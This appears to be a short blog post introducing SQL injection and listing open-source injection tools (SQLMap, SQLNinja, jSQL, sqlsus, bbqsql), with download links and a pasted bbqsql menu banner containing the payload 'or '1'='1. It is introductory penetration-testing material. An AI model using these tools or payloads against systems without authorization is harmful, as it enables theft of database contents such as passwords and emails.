What is SQL Injection?
Firstly we will discuss about what is sql injection . SQL Injection one of the most common attack against web based app. A SQL Injection is a technique to use some code to reveal the information from the database. A successful SQL injection attack can read probably all data or sensitive server data like passwords, email, username, etc. SQL injection can be very harmful. There are many sql injection tools available in the market that you can use for SQL Injection attack.
List of top SQL Injection tools.
SQLMap:- SQLMap is a free and opensource penetration testing and automatic sql injection tool. It is very easy to use and very famous hacking tool so It is installed in kali linux by default or directly you can download from here :- https://github.com/sqlmapproject/sqlmap
Features of sqlmap
- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, HSQLDB and H2 database management systems.
- Full support for six SQL injection techniques: Boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack
SQLNinja:- SQLNinja is also a very famous tool for sql Injection similarly SQLMap but SQLNinja we can not use in windows operating system. It supports Linux, FreeBSD, MAC OS X and iOS.
JSQL:- Jsql injection is a free and open source lightweight application used to find database information from the server. It is written in java so it is called jsql. It provides a common way of using SQL from within Java to access a database.
Sqlsus:- It is free and open source database tool written in perl. It is an fast database dumper, be it for inband or blind injection. By using command line interface, you can retrieve the database structure, inject your own sql queries etc. Download from here:- http://sqlsus.sourceforge.net/download.html
bbqsql:- Blind sql injection is almost similar to other sql injection tools. This framework written in python. It is extremely useful when attacking tricky sql vulnerabilities.
[email protected]:~# bbqsql
_______ _______ ______ ______ ______ __
| \ | \ / \ / \ / \ | \
| $$$$$$$\| $$$$$$$\| $$$$$$\| $$$$$$\| $$$$$$\| $$
| $$__/ $$| $$__/ $$| $$ | $$| $$___\$$| $$ | $$| $$
| $$ $$| $$ $$| $$ | $$ \$$ \ | $$ | $$| $$
| $$$$$$$\| $$$$$$$\| $$ _| $$ _\$$$$$$\| $$ _| $$| $$
| $$__/ $$| $$__/ $$| $$/ \ $$| \__| $$| $$/ \ $$| $$_____
| $$ $$| $$ $$ \$$ $$ $$ \$$ $$ \$$ $$ $$| $$ \
\$$$$$$$ \$$$$$$$ \$$$$$$\ \$$$$$$ \$$$$$$\ \$$$$$$$$
/ 'or '1'='1 \
\ '=' /
/ | \
BBQSQL injection toolkit (bbqsql)
Lead Development: Ben Toews(mastahyeti)
Development: Scott Behrens(arbit)
Menu modified from code for Social Engineering Toolkit (SET) by: David Kennedy (ReL1K)
SET is located at: http://www.secmaniac.com(SET)
The 5 S's of BBQ:
Sauce, Spice, Smoke, Sizzle, and SQLi
Select from the menu:
1) Setup HTTP Parameters
2) Setup BBQSQL Options
3) Export Config
4) Import Config
5) Run Exploit
6) Help, Credits, and About
99) Exit the bbqsql injection toolkit
If you want to learn more about the ethical hacking and CTF Challenges you can visit our YouTube channel “Vulnerable Machine Solution“.